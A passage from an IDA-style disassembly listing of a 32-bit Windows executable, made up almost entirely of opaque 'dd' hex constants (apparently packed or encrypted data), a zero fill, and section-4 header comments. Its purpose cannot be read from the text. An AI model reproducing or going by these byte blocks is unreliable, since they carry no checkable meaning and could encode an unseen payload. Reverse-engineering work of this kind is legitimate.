		dd 0CE2E4E39h, 0EF4F9F2Ch, 1070B0AEh, 3190D0D0h, 52B0F0F1h
		dd 8D824743h, 0A2D9EBA7h, 1F4AF852h, 2F41B4F7h,	0A9967B76h
		dd 7305D7F7h, 52FBB798h, 32D4B993h, 0BA3747Dh, 0FB9D6B64h
		dd 0CB700F2Ch, 0B63A0F0Dh, 9829EFE9h, 707CC8DAh, 51EEA8AFh
		dd 1DBC9298h, 0ABC786Ch, 0F297785Bh, 0FC1F1E3Bh, 9421E50Dh
		dd 6D08E7C5h, 52E08CA4h, 24CF8892h, 11810242h, 0E6974246h
		dd 0C76B3613h, 84561601h, 8334C585h, 5502D3C7h,	5CE8AAA2h
		dd 3BCFB38Dh, 69AC696Ch, 0E88C5B6Ah, 0C25E2F3Dh, 0AF4A0E18h
		dd 893ECF8Bh, 5908D9CDh, 46E1A2A2h, 7CDD818Bh, 0EA05D3Dh
		dd 0E0875C5Fh, 0C855503Bh, 0B9650519h, 9633F7E3h, 6716F4B2h
		dd 51FFBA95h, 27C787B5h, 1A1767Ch, 95B44650h, 0F0623312h
		dd 84521B1Fh, 0F83DE2FEh, 5F0DDCFFh, 6EFCB5B0h,	5BDC9493h
		dd 36AE7F5Ch, 0F78E5F54h, 0D0751A3Eh, 0B05C3319h, 0B95EDFF8h
		dd 7032CBDBh, 25F3AABBh, 4AE6148h, 80A0444Ch, 0F2762707h
		dd 0A7571018h, 912DC0EFh, 6B11C6C6h, 25C4BCB6h,	12D180A2h
		dd 20B66B63h, 0C8824B4Fh, 0E66D2527h, 0BC4C2E67h, 9927EFDCh
		dd 621FCAF9h, 4ECCCB8Bh, 3ECEBD9Fh, 2A3657Fh, 0F8886A2Ch
		dd 0DE7C2B1Ah, 8B410004h, 0A850D1F6h, 7F27C5CAh, 54FCA4BCh
		dd 3DD79FB8h, 6B37F60h,	0D39D5C5Bh, 0C7711352h,	0B05B1C24h
		dd 0B125E1FBh, 7512C5DCh, 4EE5B8A2h, 37DBB0F7h,	39B4797Ah
		dd 0FB965554h, 0D8751658h, 0B852371Dh, 822EFDE8h, 7D30BDFAh
		dd 58F48BACh, 18DBB28Ah, 7EBB7277h, 0F09A4F71h,	0DA4C0918h
		dd 9031E032h, 4005CCC9h, 47F28DC1h, 2CD0B28Ch, 10B06660h
		dd 0EC967423h, 0D7762020h, 0AC605457h, 0E633F4F7h, 6407DAF6h
		dd 1BFBBBA2h, 31CDA6DAh, 0C9B097Dh, 0E0AC4E48h,	0F90B2E25h
		dd 0A26A180Fh, 980CE8E7h, 6F07DCD8h, 5DEBBAB8h,	2AFDEEAFh
		dd 3A6497Bh, 0E69F604Ah, 0C2742521h, 0A5572170h, 973FFAD7h
		dd 7619DDE6h, 51F887D3h, 0B48491h, 5B4787Bh, 0E2935F63h
		dd 0DF51311Ah, 81381D1Ah, 8D2DEBFEh, 753BD6D9h,	3AF9B5B5h
		dd 2FD388ADh, 17B25D7Eh, 0EFB23C5Eh, 0C977391Ah, 0AF6E0A0Fh
		dd 9236E9F4h, 6CE5A7DBh, 25CB8F8Bh, 148F016Eh, 0E1875063h
		dd 0C8452634h, 8C24010Dh, 8637C6F6h, 5403D2C2h,	40E5A9B6h
		dd 8A69596h, 3B54472h, 0D68D5C47h, 0C26A2634h, 0B06F1914h
		dd 0AA3FC588h, 7E0DC9DBh, 48E99FAFh, 22C3859Fh,	21B9430Ch
		dd 0E5B85E4Dh, 0CB403829h, 0BA53153Eh, 0EF3FFEE7h, 603DC6E1h
		dd 58D4BCB5h, 1CB2979Dh, 17A35C66h, 0FD86645Ch,	0C0663031h
		dd 0B15D1927h, 811997FAh, 781DC8FAh, 43FBBD85h,	58D6979Eh
		dd 0A896D56h, 0FB9F4E57h, 0CB720D2Ch, 0B65D090Dh, 9430F8D7h
		dd 527EC7C9h, 58EB8FA8h, 27ED878Fh, 13BA6B6Dh, 0F0662E77h
		dd 0B4400C2Dh, 0E12CEDE9h, 7034D7EFh, 75E6B7ABh, 31D7918Ah
		dd 1896865h, 0FD974A49h, 0C9721444h, 0A54E0930h, 0B42DECE9h
		dd 6600DBD3h, 68E69DAFh, 19C09A87h, 4A3787Eh, 0D9BC2B4Dh
		dd 0CA781F0Bh, 0BC581919h, 8222ED8Ch, 611CCADEh, 5BEAA4ADh
		dd 3EC08CEFh, 4B3757Eh,	0E4945630h, 0C5613D38h,	0B35D0A13h
		dd 8154F1FFh, 1403D6D6h, 51FBB0A7h, 35DA86F5h, 76A2737Dh
		dd 0F383597Fh, 0C37D3624h, 0AB561534h, 973BD2FDh, 1A1ED7DDh
		dd 5EEFB593h, 28DE9589h, 3FA8795Bh, 0F9935353h,	0D97B2A3Fh
		dd 0AA5E0B2Eh, 9129A0FBh, 4EF3A4CBh, 31EE9585h,	61836C64h
		dd 0E4974D68h, 0D6612A33h, 0AD40152Dh, 0A52AF4D6h, 7109EEA4h
		dd 43E9B5A0h, 26C2B592h, 0BA14E63h, 0C3A82942h,	0E15A0B11h
		dd 8D05595Bh, 0B84CC0C5h, 672ECACFh, 67E8BEA4h,	1FAD9489h
		dd 1D816968h, 0E8A44148h, 0EF681534h, 0A854236Eh, 8237E7DEh
		dd 7D12E5C9h, 4AD6B6A4h, 36E1F3B3h, 7B14774h, 0E6995465h
		dd 0F56E1336h, 0D0DEF474h, 9E0950BEh, 0FF79B9B6h, 3BBD955Ah
		dd 5CD3F992h, 13894A48h, 0C937B03Ch, 0EE4C88D2h, 896C3D10h
		dd 61CB61C8h, 9E7F8F90h, 0AB60D319h, 5F8FD35Bh,	0BCE8E49Ch
		dd 984CC68h, 0F2225275h, 0E229D37Eh, 969BAAC8h,	24B4E88Ah
		dd 0C1AB2461h, 65C50595h, 0E5B24E75h, 728C4745h, 0BA3680Ch
		dd 0E821C9EDh, 636ABAA8h, 2AE098CBh, 4BCABE82h,	3ACB610Bh
		dd 1E137C78h, 0AC3D61C6h, 58D13733h, 0EE7FA440h, 53044F2Bh
		dd 25105D44h, 5D53F0C0h, 61D1849Ch, 40F13201h, 60EC0006h
		dd 0FF49F1F9h, 7BD895A3h, 1576AD8Ch, 0C969823Dh, 0C6337D09h
		dd 0FAD7273Bh, 97E3BDB8h, 475AB157h, 5CB18587h,	0FA6BB718h
		dd 0F03337h, 0E74DCDBh,	0D6430303h, 4DF19898h, 0E93EBB3Dh
		dd 2790D256h, 37408065h
		dd 0FF9E5E82h, 0E2DE064Bh, 42A109B4h, 0E39F0202h, 0B2F9A5CFh
		dd 2ECD7742h, 0F40585E6h, 0B412D784h, 5736F7F4h, 0B865239h
		dd 4C20E7D7h, 0A55DF72Ch, 0D5E91903h, 0FC0A4E8Ah, 0CA2B6B81h
		dd 6CDD18Ah, 0C5DB71Eh,	0B80032A6h, 4E9DF76Dh, 4E035C5Eh
		dd 8EC52F0Ah, 0C91C94CDh, 0CAF7F4A8h, 0D19F92A0h, 8BB3676h
		dd 33B7D3E2h, 97EEF3D9h, 75BE157Eh, 0E70A06CBh,	3003A950h
		dd 0BEC703B5h, 0F758989Dh, 1B22693Ch, 8C14E588h, 5A89E31Dh
		dd 7BD6A091h, 10703B3Ah, 0BB1C5D52h, 17168578h,	0E9515FCh
		dd 1B0BDE1Bh, 0D46A3D99h, 6F787C3Dh, 0D334AB77h, 0F5518DCBh
		dd 9073220Bh, 76BC7CE8h, 454883Eh, 0AE880047h, 7688ED70h
		dd 0E5122E06h, 812121CCh, 0A7EF472Ch, 0B2B3FEEh, 0C5BE1CE1h
		dd 8E6FAA99h, 0EBB9C2C2h, 0C5B05AA9h, 5CE7FC99h, 10EDB2Ch
		dd 53A72C0Eh, 0DCF1BA4h, 0EF4F67DBh, 912DB0AFh,	18BA63Dh
		dd 0A92D7BF1h, 0F1D1213Eh, 92FA164Eh, 0B3AAD75Dh, 38B57473h
		dd 0F555979Ch, 1772DEE1h, 0A269D6D6h, 5886DADEh, 0FC5AEB93h
		dd 98F93C1Ch, 0B9730958h, 0DA3A7E91h, 0AF09CD9Ah, 8983EBBBh
		dd 3DACF0F9h, 0C93135CEh, 7EDD1C1Ah, 9C946F6Fh,	0D71E350Fh
		dd 0A040807Fh, 0F0F45EF2h, 0B481F1EAh, 18D51767h, 67AA5653h
		dd 0D4E32322h, 8420F0BCh, 3A256566h, 0D66A5F10h, 0C7E2FEA6h
		dd 3C64D1B3h, 23736CB8h, 3E995A09h, 0FC7CD67Fh,	0F30A7A65h
		dd 1B5EABEFh, 21D973DDh, 806D9D87h, 79DF899Ah, 0C2F5A984h
		dd 6FCF0A98h, 4FDC842Fh, 43494025h, 816121DBh, 0A202C2C1h
		dd 0EAE64CE0h, 0B593E3F8h, 55B1FB30h, 51A0EB15h, 5C60CA3Dh
		dd 0E5166679h, 0FBFEE289h, 3A0598A7h, 27F9B9BCh, 7C98ACD3h
		dd 4EC57471h, 62391A2Bh, 8BFBAEB6h, 6D1F5C6Bh, 59EF822Ah
		dd 1D6915Dh, 107FBFBEh,	409F2F5Bh, 5AFE8000h, 0A73155h
		dd 250D427Eh, 0C2236380h, 9664BA02h, 3AE4E352h,	62CB8C94h
		dd 892EC790h, 29C740C0h, 0ECB6E90Dh, 0F45E1946h, 0E4E8FC98h
		dd 0D2138AB8h, 0B5EEA468h, 0C28BCBCAh, 4CABEB5Ah, 3E9C328Dh
		dd 9E27B65h, 0AD0E4EE9h, 6227A9EEh, 6B5F9DB2h, 1071B136h
		dd 0C2E4F1ECh, 5D8BCD5Dh, 72D29E97h, 0B2FE9E32h, 8E347472h
		dd 0A0501252h, 0C9FAE9E1h, 970BC295h, 5FB728A8h, 29C28383h
		dd 8DB6699h, 0EDD61602h, 465D9C30h, 600A7479h, 0FB5CBB8Ah
		dd 0E32F5F4Ch, 0DB1B449h, 0E7DCEFDh, 968E4E4Eh,	9EFF3F37h
		dd 0D1570F1Ah, 8420EE13h, 0D0F75DA0h, 0A782F2EDh, 70949622h
		dd 98468ACAh, 0D2E4140Fh, 0A406452Bh, 937737E0h, 33D278D5h
		dd 8A68988Ah, 1893B852h, 809BB8E8h, 3B99585Dh, 1C157B78h
		dd 0AA3B6748h, 340868EDh, 0DC66401Eh, 8DAD56ACh, 1E9BA140h
		dd 8C57EFEEh, 6BEB5384h, 8FF030C7h, 5D900C4Fh, 0D1026F0Dh
		dd 0C2102E1Ah, 0A6FFB482h, 34A4E498h, 0D83F0FF7h, 75E52552h
		dd 107D93C6h, 0B6276716h, 0E707EDFDh, 7D5A99A7h, 194A8A8Fh
		dd 0B2F2D850h, 0A4BAFAE9h, 4BF7728Eh, 0C735D73Bh, 0D56B381Fh
		dd 8D621B1Fh, 972CE6F5h, 52ECA1DDh, 32CF8DBAh, 0B2F20179h
		dd 76B0EDABh, 40801199h, 0C1640E62h, 8917D27Bh,	0BFD32BBBh
		dd 9C86F6D9h, 46A6E6F2h, 988A038Bh, 0E017D7D9h,	0EA0DC4EDh
		dd 0C82A6A67h, 0AEC620EEh, 0EE5E07ADh, 0C927AA66h, 7F396110h
		dd 38CD3D3Ch, 73BC2846h, 9D23D6D9h, 0EA44FB6Dh,	0F7951286h
		dd 957D722Ah, 3192D375h, 72DAF29Bh, 24D31313h, 70B3F58h
		dd 0B32579F3h, 5F3A28F8h, 68DE87DAh, 16488882h,	7A3555Fh
		dd 0BB39F8C7h, 7726E918h, 98906969h, 0CE45D32h,	0DA0C4C4Ah
		dd 0D7180865h, 0E32EBE8Bh, 0DAEED69h, 932B01FDh, 26DF2F35h
		dd 909380BBh, 0C02035DBh, 0DAC3E480h, 0E17F9ECh, 4E163C91h
		dd 0ADA3D3CFh, 64C40545h, 842D9BA9h, 12094644h,	0B2AA792Bh
		dd 0E32097B7h, 5F69A9A6h, 5A85C37h, 1DFFE9D9h, 41239FF5h
		dd 0C9602B1Ah, 20CF4F76h, 1F2E153Bh, 666EFC07h,	3AE2B7E7h
		dd 2C229EFDh, 51D76E2Ch, 2B54375h, 62133444h, 98BFB909h
		dd 0A0B8577Dh, 57CDB6h,	1B69E738h, 36DBD163h, 0D4817E26h
		dd 385DE515h, 0A942BE3Eh, 3C186866h, 0EF8C4241h, 8B5AAAA8h
		dd 2DCE903Ah, 9BEBEAh, 6C8BC04Eh, 0D5F131Ch, 0AF02C2C3h
		dd 0FEABD79Ch, 573F4F4Dh, 0CF50E713h, 4AD191BFh, 40CBB1E3h
		dd 61C20269h, 41C74A1h,	0A2345139h, 0E8D4F09Dh,	69B986B3h
		dd 557B2DCh, 29783F46h,	0B858DC62h, 544D81F8h, 0EDE91917h
		dd 0FE0A2047h, 0A8BE9438h, 614CBCA5h, 3B5DEA2Fh, 2E6D0CCBh
		dd 4DC7BDBCh, 41F39BF2h, 8662F1Dh, 0AE206006h, 0CF5BA5E5h
		dd 0A0606DDDh, 2140064Fh, 0A76CD3E1h, 5383DFABh, 43E79198h
		dd 977C3503h, 7983A977h, 5E37475Fh, 43D3A4C6h, 174989FDh
		dd 0C838D5Ch, 0CC920773h, 79EA2A2Eh, 0A9BCB6B2h, 91B15C69h
		dd 21DFD6B8h, 0E12A1B16h, 4C2EBF8Ch, 6FCE8F8Eh,	73BE6A01h
		dd 80B0202Fh, 902A8CAAh, 0B207A160h, 8779A9BBh,	6F06C5CCh
		dd 64BEA0A6h, 29C18C97h, 4BF73669h, 0A98A4A41h,	0F5077668h
		dd 827C3B3Fh, 9D0AD5CAh, 670FD8DAh, 44E589BDh, 27C5989Eh
		dd 37BF6E58h, 0FD9E4978h, 0DF682E22h, 0AC463D30h, 0AF2BEAFFh
		dd 7C15D3CDh, 51C08CBCh, 34DD9182h, 2A37465h, 0E39B746Dh
		dd 0DE722434h, 0BF5B241Eh, 0A82CF6FAh, 7B17C2E7h, 52E4B7B1h
		dd 31D984A6h, 2BB27B7Eh, 0FF8C4D76h, 0C2702B38h, 0A97B1E1Dh
		dd 9932F7E9h, 7415C8DBh, 70C0AFB5h, 5DC88F95h, 299B524Eh
		dd 0D8AC7F6Ah, 0DD761201h, 0B033EF0Ch, 573DD5F9h, 4EE5AFA9h
		dd 1FD9296h, 7B07077h, 0E7B5574Ch, 0CC6D3730h, 0BC60390Dh
		dd 9729EAF4h, 5267D5C0h, 42E0B5A7h, 3BC8AF93h, 68CA087Ch
		dd 88E97928h, 0DB7A4A48h, 0A7421306h, 8038E2A4h, 7C01C3D9h
		dd 43E4E3ADh, 0AD828Bh,	4E854D47h, 0E98A4759h, 0D8683C37h
		dd 95622465h, 0BB2AB2C2h, 323DFAFEh, 41FAA5F4h,	5E808687h
		dd 74D4FC41h, 15A83534h, 8536B0B9h, 0B9B2B175h,	0F758A883h
		dd 34542C48h, 0D158D9E8h, 30E88DE6h, 9B6F9104h,	0C3FB0B11h
		dd 0CE3260F6h, 0E2BC1B51h, 0DE2B8363h, 328E0230h, 4914DFEEh
		dd 61AA8FDh, 8E65AD85h,	2E01716Bh, 0F20956E4h, 0A5CA7982h
		dd 0FA2A2859h, 0C785753Fh, 0B911692Ah, 0EC5352Ah, 86E62722h
		dd 9E92B810h, 2128584Bh, 0E9498901h, 1FC32F24h,	41DACAFAh
		dd 0B3A480EBh, 5CE74299h, 0A890AF2Ch, 0DC784944h, 0CE2E6685h
		dd 0AC09DC8Eh, 5C3CF481h, 2C052FD0h, 59B0C0DDh,	18C565D2h
		dd 0FA1A6230h, 4CECACABh, 0E41FADE6h, 81951094h, 0FEA649B7h
		dd 3796D6DDh, 7F5B0A4h,	3CF94457h, 67F87474h, 893544CDh
		dd 237B9279h, 4ED66465h, 1C4C9044h, 3D9DD8B4h, 0CB43AAFDh
		dd 7EED313Fh, 9EFE33D6h, 0ED5B035Eh, 0B205D636h, 5524FDF3h
		dd 0DDD7C182h, 738A0877h, 63C5EA03h, 0CBBF2323h, 0F750170Ch
		dd 50DA3364h, 0E676AD6Ch, 56366E95h, 42D6C4ADh,	49A78FE9h
		dd 969E4809h, 0B9C2D8BCh, 55F2C949h, 467B481Eh,	0DC60731Eh
		dd 96E020ACh, 448DFDEAh, 55C5BFEEh, 3ECE0E0Fh, 0FA7AD07Fh
		dd 4F106063h, 0E11ABCE5h, 0F2597A91h, 4026B3B2h, 6A08196h
		dd 19FFB7DAh, 3441EB15h, 7DF50519h, 0B616565Fh,	0A5470401h
		dd 9E2CF6FEh, 0E629B9F9h, 0AB2004Ch, 0BE3C70FAh, 74DA2A30h
		dd 0C976B60Ah, 351C6C42h, 0ED118AF9h, 6BA1CF9Dh, 1F4F93FFh
		dd 409BB74Ch, 0D54D0000h
		dd 80D1387Fh, 7CBFCF19h, 2A23534Dh, 1CBB767Eh, 0A0E062C5h
		dd 2585F5E4h, 0E00066B5h, 66C63626h, 0A683B2ABh, 0F3584876h
		dd 0C843680Dh, 0E948E2DAh, 9F942BA9h, 2BBBE72Bh, 39F12B6Eh
		dd 0FB41812Eh, 0DEED1D0Ch, 18834826h, 0CE1F4FC9h, 0BF00C6DAh
		dd 858EE3FEh, 31A1FD35h, 8F240EA9h, 0B4D2223Eh,	0A2DDCDB7h
		dd 0DDFC5452h, 2BCA8A81h, 0C544EB19h, 5AF270B5h, 6197E7C3h
		dd 0B084A8A3h, 8727EA41h, 8DB5BCFFh, 0ED4C5A68h, 90D34F26h
		dd 3CA36368h, 2C68F13Eh, 62E58BDCh, 0AC8615C9h,	0FB19E1E1h
		dd 9ECF2A72h, 0EB560508h, 65CC484Ch, 15292EFh, 73D39390h
		dd 12F3B3B2h, 4FF696FCh, 161B2413h, 0A435696Eh,	0B0398EA5h
		dd 0E64B6FF1h, 4F3BA8A6h, 78C99F8Bh, 5ECC6A1h, 0FC360945h
		dd 89DA0668h, 0AA0B47A1h, 98643F6Ah, 8D1BF9EEh,	4C0BDBC0h
		dd 0BB719ECDh, 4F9EC537h, 907A829Ch, 0E7F00003h, 0B0115187h
		dd 2E321826h, 0C27F8A04h, 0C1E139B2h, 0B994E4CCh, 65993349h
		dd 22874315h, 0BE13A3CAh, 72945765h, 38ADF57Ah,	0A859A988h
		dd 4F7BD0EFh, 3A98B28Bh, 88457AFAh, 842106F3h, 0A941BFC4h
		dd 0BC1D6D4Eh, 55567508h, 15F9F8Eh, 2FACA92Bh, 40AC08DFh
		dd 33960100h, 0B3A9616Fh, 0ED476D72h, 57DB642Dh, 0E375A9C3h
		dd 461CE30h, 900BC6C4h,	4696FE53h, 0CB7A8A5Fh, 6EE8180Ah
		dd 58F6B8CAh, 0C82A668Fh, 0A702DC88h, 5E29E2E0h, 67C088E4h
		dd 0D3913EBh, 0E9CD3D20h, 0B96A21ECh, 3E0F4F4Eh, 0CE307505h
		dd 1BE41C8Eh, 497282B7h, 1D5B6F5Dh, 75AF2C1h, 0F12CECE3h
		dd 0A2D8F98Fh, 371A5552h, 0D4367463h, 0F4C77B15h, 7E2CB8B5h
		dd 3798D9D7h, 74156D08h, 0BC581928h, 98FA3BA8h,	0D3CFD008h
		dd 4FC32E79h, 0FB6DB157h, 69277E3Eh, 2E16B6D1h,	0CB41FEFDh
		dd 7EEF3377h, 2283A2D5h, 0C01141F9h, 6C6BF780h,	32430924h
		dd 0B67C93C2h, 4493CF5Ah, 0E0CBC481h, 84E524ADh, 2E0A06CFh
		dd 49179865h, 0D7682E03h, 0F6EC6FA7h, 2889F9E6h, 4BC3E983h
		dd 0FF350860h, 8ADB07EFh, 0A4F3B4C9h, 0CC2C0DEFh, 78C31D8Ch
		dd 0E5F8F0Fh, 7CDDDFA4h, 7C1A7A10h, 0B0551020h,	91B1B43Fh
		dd 0C9F5250h, 0D20353B5h, 82BC9C23h, 7C8A4A45h,	3595D540h
		dd 0DF53DEABh, 89823222h, 0A6DB06A3h, 65A5D556h, 69394957h
		dd 0F087299h, 8FF64446h, 3BABFB65h, 48D3FB91h, 2EDC1C1Ch
		dd 5D68C26Fh, 301E6E70h, 532B5B39h, 0CF50EF0Bh,	968E91BFh
		dd 65E56AEAh, 6922C315h, 93E26923h, 0E816460Bh,	0E7616E61h
		dd 0EBA7068Bh, 546F4765h, 36A383CEh, 0CAF7D519h, 57E4F7BAh
		dd 87F5C127h, 862F4A47h, 0E70B135Eh, 0D06CA2A9h, 2548888Fh
		dd 54A8B5F3h, 47DEC8CCh, 23874147h, 72B82F0Dh, 9E3BB5D8h
		dd 63F5F06Eh, 9A52928Fh, 4224E3B0h, 1E52462Eh, 0DE38F3C2h
		dd 73E40121h, 88163559h, 0E51B9F38h, 0D537729Ch, 927DBE95h
		dd 0E82EB9BCh, 8B23C42h, 557D7AF8h, 11D1F149h, 99FB3B31h
		dd 9AC4E1D4h, 886A7D4Ah, 0D09F0B64h, 0DDFABF8Ch, 8B128BA3h
		dd 5F8FD301h, 6AD2859Ch, 2D01410Fh, 0F10C9CEDh,	888DA881h
		dd 5032F5A2h, 839513Ch,	0BD27E4D4h, 0F4EA7B05h,	306BD8AEh
		dd 0A6376BBAh, 69DA65D6h, 2999F2h, 0F6955CF2h, 0C99DB8A8h
		dd 4ADD67E3h, 0A440E1E0h, 3661E200h, 0AC3D61B4h, 3AA9CA9Fh
		dd 111C3666h, 3F5C013Bh, 5F2D50CFh, 50B0C0E5h, 41B93B65h
		dd 6EF23244h, 823F3AC4h, 2D89F472h, 0F455A5BDh,	90B1A7C0h
		dd 36A6F673h, 57B6F6F6h, 592992D1h, 7EF83807h, 47E6A75Fh
		dd 0D93EB825h, 0D4A42E14h, 0E42ABC8Ah, 0CB0D14Eh, 0A2447FFCh
		dd 7D669912h, 18773E3Dh, 0BE2F6F5Eh, 20168014h,	304DFC0Ah
		dd 2E4144C0h, 42A14565h, 32022902h, 0D2E04972h,	0A36C4528h
		dd 92E56563h, 0CEB7137Bh, 0FEE4A795h, 1503C839h, 0C1A7E7E3h
		dd 58F80F8Dh, 8364A428h, 240A7A78h, 0FA1B78FCh,	811EDD8Ah
		dd 9992FDABh, 2DBDE1D9h, 4152156Eh, 6ECA0E8Ah, 71EF452Eh
		dd 9F2057FBh, 0C1A48E6Fh, 7252A2BCh, 967C4C49h,	3393D03Bh
		dd 64A8767Ah, 0BDE71424h, 0C4A4F637h, 0E4123C05h, 0E630C28Ah
		dd 62A798A6h, 18499242h, 0BD96195Dh, 5AB9FA3Ch,	0FF53D329h
		dd 9ACB0B25h, 0D34D0D0Bh, 0DC327D64h, 0B8CB61CCh, 9B7F8F91h
		dd 411BD01Eh, 0E9BFFFFCh, 0B0D003A5h, 0EA8A8240h, 0A271DA59h
		dd 31708382h, 0F59365A0h, 0A00D2533h, 4694D4CAh, 0DEF94E8Dh
		dd 86E63DEAh, 66049575h, 29DF9990h, 0D96E0C01h,	5A9AA99h
		dd 0D28C817Dh, 1F27DC08h, 2F7C0414h, 0C53C2F38h, 0AE258C27h
		dd 9114EFBDh, 1621E6F9h, 9339AEDBh, 4391DCAAh, 6EFB7B2Eh
		dd 71C55399h, 0D67F2270h, 6AE4AC1Ah, 510FB550h,	0F565A58Fh
		dd 52FDEF76h, 0BF1FDAF2h, 58B6F64Fh, 4914D72Bh,	0A8D60F0Ah
		dd 88376976h, 914E3459h, 8B37F5E8h, 721592DAh, 3791B3BAh
		dd 38D5C0DEh, 1BB07C6Ch, 0FD8C4D1Eh, 0CB777D63h, 0CF7AF00Bh
		dd 4A15EF8Fh, 52EDAFB3h, 2DC8CF83h, 11ED6D65h, 0EADC0C40h
		dd 8426757Eh, 0B1410C13h, 0C677BBEDh, 600EC2CEh, 19BAB3AFh
		dd 30D394C8h, 4BF56D65h, 0ED9B464Bh, 9A30382Ch,	0E4175548h
		dd 8D3EEAE2h, 53C8C1h, 0A57346C7h, 7F9DF663h, 0EC80BE0Fh
		dd 211D2BC6h, 8F91593Ah, 0BF433A04h, 799166E4h,	8FE384Ch
		dd 8493E3E3h, 505A70C8h, 9BA1BAE7h, 0E0DA0AB5h,	0B751DDA2h
		dd 8E8A853h, 0B71AA548h, 0F10CE0FCh, 0D267F296h, 5BB9FBD6h
		dd 7BDA4273h, 6A13603Bh, 0C8E3A3A6h, 0C6B0F65Ch, 735EAEADh
		dd 0D054BE8Ah, 73A35291h, 0E764F3FDh, 819FACF9h, 86B7F7CDh
		dd 31DF6351h, 2CCF4726h, 0B9E8AE48h, 25B5EB3Bh,	757A6E19h
		dd 7FAAACFh, 0FCDB2154h, 87244A31h, 0BC7555CDh,	9D64B664h
		dd 7F6B9774h, 0A0B62822h, 1F2E2DEAh, 6CCC3C3Ch,	0C9B56811h
		dd 903C3A4Ch, 0CE7D2C3Eh, 1075BBFAh, 2D714E50h,	31DC8598h
		dd 28CE385h, 6D2425Ah, 0C1B20E39h, 361B5402h, 2BCA8B32h
		dd 0C505136Ah, 259CB785h, 0C869483Fh, 65B47C08h, 3B96514Fh
		dd 66DEBD37h, 0EE27A5A7h, 0D5752E3Ah, 4A2801Eh,	5F2A8044h
		dd 0B992EFEFh, 0A14203ECh, 2A8D4E23h, 987B3071h, 8CDF9FA0h
		dd 1D6F69A4h, 856D5D5Fh, 0DD7D3F38h, 554A30D1h,	8BC30303h
		dd 7C1BDA7Ah, 0A40545ABh, 28A73B64h, 0E677AEBCh, 7699A4Fh
		dd 1A77ACC7h, 798B5D63h, 0E0AD0939h, 0DA57AA0Bh, 0AB0B7B79h
		dd 65C4661Fh, 5B27275h,	0D6EAFBFh, 63B04FABh, 472BE1B4h
		dd 0E4CF0F0Eh, 51F30C71h, 0E02AD029h, 29B77D35h, 5539391h
		dd 3374A2F1h, 0B19BD4D3h, 55B4F41Fh, 778956E3h,	9517B23Ah
		dd 0C8965755h, 0F7185856h, 2CDD96B7h, 0F17ABAB8h, 0C565277Eh
		dd 5B7378F5h, 39501B1Bh, 8BB6B733h, 0B86E9C70h,	0D8D5BE4Fh
		dd 0B4D6579Eh, 340549AEh, 0A8A0D0EFh, 9F3EFC56h, 80E28DC8h
		dd 869EC840h, 0C1245451h, 0D375AE1Fh, 0F8084EA3h, 0A189393Bh
		dd 46A6E66Ah, 56E4B28Dh, 0D8632816h, 4FD74A7Ah,	37D59730h
		dd 0A3CAF6FAh, 0A6CCC8Dh, 7D72472Ah, 0C1B896E8h, 5CDD0DB9h
		dd 9C942D2Ch, 0AD09BCF5h, 6BC3276Dh, 0EDB2903Fh, 4E2D165Ch
		dd 0A3A3DD82h, 5230757Ch, 0FBB51312h, 6D0BAFA2h, 56C5BDADh
		dd 5F6C898Ch, 0BF549BDEh, 103935A5h, 0BEB09BFDh, 58B8A770h
		dd 589FDE18h, 0B8DA1A18h, 323310D1h, 5FB76C33h,	0FB6DADBDh
		dd 6F76F482h, 35D457DFh, 0DDAEBCFCh, 0F5DF477Dh, 0AF306FBBh
		dd 0C863605Fh, 0D212C181h
		dd 20E8C773h, 7B814CA6h, 74A45E60h, 6BC40434h, 7B19B1A0h
		dd 86B3B9BBh, 39275755h, 0D764E513h, 17DC56A7h,	0D689F9F8h
		dd 7A82247Ch, 6147870Ah, 7EB1B1Ah, 9B3C5FDFh, 0A67F3C6Bh
		dd 0EAFB718Ch, 0F16F9F9Dh, 1FA3AA5Bh, 571A10EFh, 8FD02020h
		dd 0A0DAFCA5h, 4EA7DF50h, 2D33435Fh, 0C3649727h, 818AE3B3h
		dd 35A5F989h, 66B25076h, 0B5D61626h, 96F737DEh,	0B6720556h
		dd 0F2D494F6h, 9029AA8h, 62FE7AB6h, 0BE9BEBCFh,	9438383Bh
		dd 0BDD3ECE3h, 0ACE845B9h, 0AD239D5Ch, 0AB3F557Dh, 83E1C682h
		dd 51EDCD9Bh, 0A9C1F295h, 9E3DFDC5h, 0DA0B2654h, 4AFBBBBCh
		dd 3CDA9AB0h, 0C9B9A8E2h, 1753F1DCh, 2687E27Dh,	0E24F87E6h
		dd 1237F7F8h, 0A3ADA21Eh, 57BFC777h, 422B5B46h,	6B2A84D9h
		dd 786FAB90h, 2CE59BEEh, 0C6AD12ECh, 3FCE64C9h,	247AD07Dh
		dd 2D106061h, 0F1B079AAh, 0AC6DADD3h, 0D7F0B0C5h, 0CF9B3BD5h
		dd 2C5B0C0Dh, 122BEBECh, 93818DF0h, 5FD5653h, 0D53758CCh
		dd 0F6487095h, 37BBB9B6h, 38A961D7h, 5A51F9F8h,	0BBDA1A19h
		dd 0CD763B1Dh, 94D1507Dh, 0A73D85F9h, 0FCB6FE82h, 967FBFBCh
		dd 63AFFB89h, 0B23EE575h, 7FD00BA8h, 5FEF46D7h,	0C5E0039Fh
		dd 150Dh dup(0)
seg002		ends

; Section 4. (virtual address 00012000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00012000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 412000h
		dd 80h dup(0)
		align 1000h
_idata2		ends


		end start